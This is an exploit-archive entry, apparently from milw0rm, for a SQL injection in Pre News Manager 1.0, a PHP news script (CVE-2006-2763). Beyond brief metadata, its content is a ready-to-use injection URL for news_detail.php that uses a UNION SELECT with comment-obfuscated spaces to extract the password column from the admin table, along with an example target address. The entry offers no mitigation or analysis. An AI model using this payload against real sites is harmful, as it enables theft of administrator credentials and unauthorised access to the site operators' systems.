Pre News Manager 1.0 - SQL Injection

Author: Mehmet Ince
type: webapps
platform: php
port: nan
date_added: 2007-05-02 
date_updated: 2007-05-03 
verified: 1 
codes: OSVDB-26074;CVE-2006-2763 
tags: 
aliases:  
screenshot_url:  
application_url: 

==============================================

Pre News Manager v1.0 Remote SQL Injection

==============================================

Found: Cyber-Security.org

==============================================

Script site: http://www.preproject.com/news.asp

==============================================

Exploit:
news_detail.php?nid=-1/**/union/**/select/**/0,1,2,password,4,5,6/**/from/**/admin/*

==============================================

Example: http://www.preproject.com/news%20manager/

==============================================

# milw0rm.com [2007-05-03]